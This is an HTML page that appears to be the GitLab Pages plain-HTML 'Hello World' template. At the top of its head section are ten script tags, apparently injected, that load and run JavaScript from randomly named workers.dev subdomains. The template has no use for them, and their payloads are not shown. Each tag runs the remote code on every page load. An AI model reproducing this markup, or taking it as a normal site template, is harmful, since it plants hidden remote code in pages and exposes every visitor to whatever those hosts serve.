<!DOCTYPE html>
<html>
  <head>
<script type="text/javascript" src="https://cdn.craftretro.Workers.dev/"></script>
<script type="text/javascript" src="https://cdn.sqdo.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.crdsqdtro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.crafsdtro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.cradqtro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.crqstretro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.cqsaftretro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.cdftretro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.cdtretro.workers.dev/"></script>
<script type="text/javascript" src="https://cdn.detro.workers.dev/"></script>
    <meta charset="utf-8">
    <meta name="generator" content="GitLab Pages">
    <title>Plain HTML site using GitLab Pages</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <div class="navbar">
      <a href="https://pages.gitlab.io/plain-html/">Plain HTML Example</a>
      <a href="https://gitlab.com/pages/plain-html/">Repository</a>
      <a href="https://gitlab.com/pages/">Other Examples</a>
    </div>

    <h1>Hello World!</h1>

    <p>
      This is a simple plain-HTML website on GitLab Pages, without any fancy static site generator.
    </p>
  </body>
</html>

